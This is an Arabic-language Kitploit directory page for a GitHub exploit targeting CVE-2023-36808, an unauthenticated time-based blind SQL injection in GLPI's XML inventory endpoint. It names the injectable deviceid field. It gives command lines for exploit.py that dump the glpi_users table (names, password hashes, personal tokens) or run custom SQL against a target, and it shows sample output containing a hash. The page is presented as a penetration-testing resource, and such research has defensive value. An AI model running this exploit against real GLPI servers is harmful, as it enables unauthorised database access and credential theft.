Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit-cve-2023-36808 — GLPI cve-2023-36808 | Kitploit
أدوات/GitHubGitHub/fransosiche/exploit-cve-2023-36808
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

GLPI cve-2023-36808

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-36808 - حقن SQL غير مصادق عليه في GLPI

الثغرة الأمنية

إصدارات GLPI الأقل من 10.0.10 تعرض نقطة نهاية جرد XML غير مصادق عليها في /front/inventory.php.
يتم حقن حقل <deviceid> مباشرة في استعلام SQL دون تعقيم:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

لا يلزم وجود مصادقة. تسمح الثغرة بالوصول الكامل للقراءة من قاعدة البيانات عبر حقن SQL أعمى.

الاستغلال

يستخدم هذا السكريبت الحقن الأعمى المستند إلى الوقت مع البحث الثنائي لاستخراج البيانات بشكل أسرع بكثير من الأدوات العامة.

  • نوم واحد لكل فحص منطقي (موثوق بغض النظر عن حجم الجدول)
  • البحث الثنائي: حوالي 7 طلبات لكل حرف بدلاً من 95
  • التوازي على مستوى الحقول: يتم استخراج الاسم وكلمة المرور والرمز في وقت واحد لكل مستخدم
  • حد التزامن يمنع التداخل الزمني بين الطلبات المتوازية

المتطلبات

root@kitploit:~
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# تفريغ جدول glpi_users بالكامل (الاسم، تجزئة كلمة المرور، الرمز الشخصي)
python3 exploit.py http://<TARGET>/glpi

# استعلام SQL مخصص
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# ضبط التوقيت (نوم أقل = أسرع، قم بزيادته إذا حصلت على نتائج خاطئة)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# زيادة حد الطلبات المتوازية (الافتراضي 2، قم برفعه للأهداف البعيدة عالية التأخير)
python3 exploit.py http://<TARGET>/glpi --parallel 4

مثال على المخرجات

root@kitploit:~
[*] CVE-2023-36808 - GLPI حقن SQL غير مصادق عليه
[*] الهدف : http://10.0.0.1/glpi/front/inventory.php
[*] النوم : 0.5s  العتبة: 0.35s  التوازي: 2

[+] الهدف يمكن الوصول إليه
[+] تأكيد الحقن

[*] المستخدم 1/7
  الاسم               glpi
  كلمة المرور           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  الرمز الشخصي     xxxx
...

المراجع

  • NVD - CVE-2023-36808
  • إشعار أمان GLPI
تنزيل الأداة